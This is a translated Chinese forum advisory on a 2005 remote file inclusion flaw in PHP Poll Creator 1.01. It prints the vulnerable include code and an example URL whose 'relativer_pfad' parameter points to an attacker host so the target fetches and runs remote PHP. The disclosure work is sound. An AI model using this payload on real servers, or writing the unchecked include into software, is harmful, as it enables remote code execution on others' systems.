[翻译]PHP Poll Creator 的include文件存在漏洞让遥远的使用者运行任意指令
资料翻译: fpx[BCT]翻译网站: Bug.Center.Team [url]http://www.cnbct.org[/url]
漏洞发现: rash ilusion
SecurityTracker ID: 1014061
CVE 叁考: GENERIC-MAP-NOMATCH
日期: 2005 年5月 26 日
影响: 攻击者可以通过网络,运行任意指令
影响版本: 1.01
摘要: PHP Poll Creator存在漏洞,利用此漏洞远程攻击者可以在目标主机上运行任意指令。
漏洞与'poll_vote.php'脚本包括的 'relativer_pfad' 叁数有关。远程攻击者通过构造特殊的URL使目标主机运行任意PHP指令,其中PHP指令包括操作系统指令。
漏洞网址示范:
http://[target]/poll_vote.php?relativer_pfad=http://[attacker]/dir/
解决: 官方尚未公布解决方案。
厂商网址: [url]www.phppc.de[/url]
存在漏洞代码:
-------------------------------------------------------------|
<?php
include $relativer_pfad . "config.inc.php";
include ($relativer_pfad . "lib/functions.inc.php");
....
?>
利用示范:
-------------------------------------------------------------|
poll_vote.php?relativer_pfad=http://domain.tld/dir/
页:
[1]